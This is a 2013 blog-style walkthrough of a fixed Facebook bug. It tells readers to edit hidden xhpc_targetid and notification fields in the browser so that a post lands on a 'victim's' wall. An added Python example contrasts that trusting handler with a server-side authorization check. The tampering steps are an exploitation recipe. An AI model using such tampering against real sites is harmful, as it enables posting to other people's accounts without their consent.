Mark Zuckerberg's Facebook wall 'hacked'

06/09/2013 18:49


Here are the technical details of "Khalil's Bug", which allowed him to breach the privacy of any user and post on anyone's wall.
I found how it worked within 30 minutes after the news became public, but I am posting it now.

Step 1:
Go to your own wall and write the message that you want to be posted on your victim's wall.

Step 2:
Go to your victim's wall and find his Facebook ID number (https://graph.facebook.com/victims-username) and copy his Facebook ID.

{
"id": "10000020821XXXX",
"name": " .................... ",
"first_name": ".........",
"last_name": ".............",
"link": "https://www.facebook.com/..........",
"username": "...........",
"gender": "male",
"locale": "en_US"
}

Step 3:
Right-click the Post button on your wall, where you typed the message that you want to be posted on your victim's wall, and click the "Inspect Element" feature of Google Chrome. (This can be done using Mozilla Firefox too.)

Step 4:
Now the final and most important thing: we need to change all the ID attributes of composer.php and replace them with your victim's Facebook ID number, that is, the xhpc_targetid attribute takes the value of your victim's ID (replace your ID with the victim's ID here).

Step 5:
Now search for fbnotificationsLIST.
You will find 2 lines.
Go to this one:


bigPipe.onPageletArrive({"content": {"fbNotificationsList_wrapper": {"container_id":"u_0_3c"}},"jsmods": {"require":[["NotificationXOut","setupCancelListener",["m_0_3a"],[{"__m":"m_0_3a"},victimsID_here]],["NotificationXOut","setupCancelListener",["m_0_3c"],[{"__m":"m_0_3c"},135045834]],["NotificationXOut","setupCancelListener",["m_0_3e"],[{"__m":"m_0_3e"},135043265]],["NotificationXOut","setupCancelListener",["m_0_3g"],[{"__m":"m_0_3g"},135040917]]],"elements": [["m_0_3b","u_0_2e",2],["m_0_3e","u_0_29",2],["m_0_3f","u_0_2g",2],["m_0_3h","u_0_2h",2],["m_0_3a","u_0_23",2],["m_0_3c","u_0_26",2],["m_0_3g","u_0_2c",2],["m_0_3d","u_0_2f",2]]},"css":["P8sYO","OoJIY","zpUsI"],"bootloadable":{},"resource_map": {"zpUsI":{"type":"css","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y4\/r\/16yGUeAISb3.css"}},"js":["YNoHr","Uon2R","M\/U6d","ic9Fd"],"onload":["window.presenceNotifications && presenceNotifications.fromDom()"],"id":"fbNotificationsList_wrapper","phase":2})
and replace your ID with the victim's ID.

Step 6:

Now search for the globalcontainer attribute and go to this line:
<input type="hidden" autocomplete="off" name="xhpc_targetid" value="victimID_here">
Replace your ID with the victim's ID.

Step 7:
Now find all the "xhpc_targetid" attributes and change their value to the victim's ID number.

Step 8:
Now just click on POST (on your wall, where you typed the message that you want to be posted on the victim's wall).

# This bug has already been fixed, so Facebook will now show "This message could not be pasted on this wall". In Khalil's case the bug was still unfixed, so he was able to post the message on anyone's wall, including that of the great "Mark Zuckerberg".
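
The root cause in the steps above is a server that lets a client-editable hidden field (xhpc_targetid) decide whose wall receives the post. The following is an added example, not Facebook's code and not part of the original post: a hypothetical handler shown in its trusting form next to a version that authorizes the target server-side. The class and method names, the "own wall or friend's wall" policy, the rejection text and the user IDs are all assumptions made for illustration.

```python
# Added example: hypothetical wall-post handler, not Facebook's code.
from dataclasses import dataclass, field

class PostRejected(Exception):
    """Raised when the session user may not post to the requested wall."""

@dataclass
class WallService:
    friends: dict                      # user id -> set of friend ids (constructed data)
    walls: dict = field(default_factory=dict)
    audit: list = field(default_factory=list)

    def post_trusting_form(self, session_user, form):
        # Pre-fix shape: the hidden xhpc_targetid field alone selects the wall.
        target = form["xhpc_targetid"]
        self.walls.setdefault(target, []).append((session_user, form["message"]))
        return target

    def post_checked(self, session_user, form):
        # Treat xhpc_targetid as untrusted input and authorize it server-side.
        target = str(form.get("xhpc_targetid", ""))
        if not target.isdigit():
            raise PostRejected("malformed target id")
        # Assumed policy: a user may post on their own wall or a friend's wall.
        if target != session_user and target not in self.friends.get(session_user, set()):
            # Record the mismatch so tampered target ids show up in monitoring.
            self.audit.append({"actor": session_user, "target": target})
            raise PostRejected("not allowed to post on this wall")
        self.walls.setdefault(target, []).append((session_user, form["message"]))
        return target

def demo():
    # Constructed sample data: 1001 and 1002 are friends; 2002 is a stranger.
    svc = WallService(friends={"1001": {"1002"}, "1002": {"1001"}})
    tampered = {"xhpc_targetid": "2002", "message": "hello"}
    results = {"trusting": svc.post_trusting_form("1001", tampered)}
    try:
        svc.post_checked("1001", tampered)
        results["checked"] = "accepted"
    except PostRejected as exc:
        results["checked"] = f"rejected: {exc}"
    results["friend"] = svc.post_checked("1001", {"xhpc_targetid": "1002", "message": "hi"})
    results["audit"] = list(svc.audit)
    return results

if __name__ == "__main__":
    print(demo())
```

The checked handler ignores whatever relationship the page's markup implies and derives permission only from the authenticated session and server-side data, so editing the form in the browser changes nothing except the audit log.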


Summary:
Find the victim's ID using the Graph feature of Facebook.
Change all xhpc_targetid attribute values to the victim's ID.
Change the fbnotifications attribute to the victim's ID.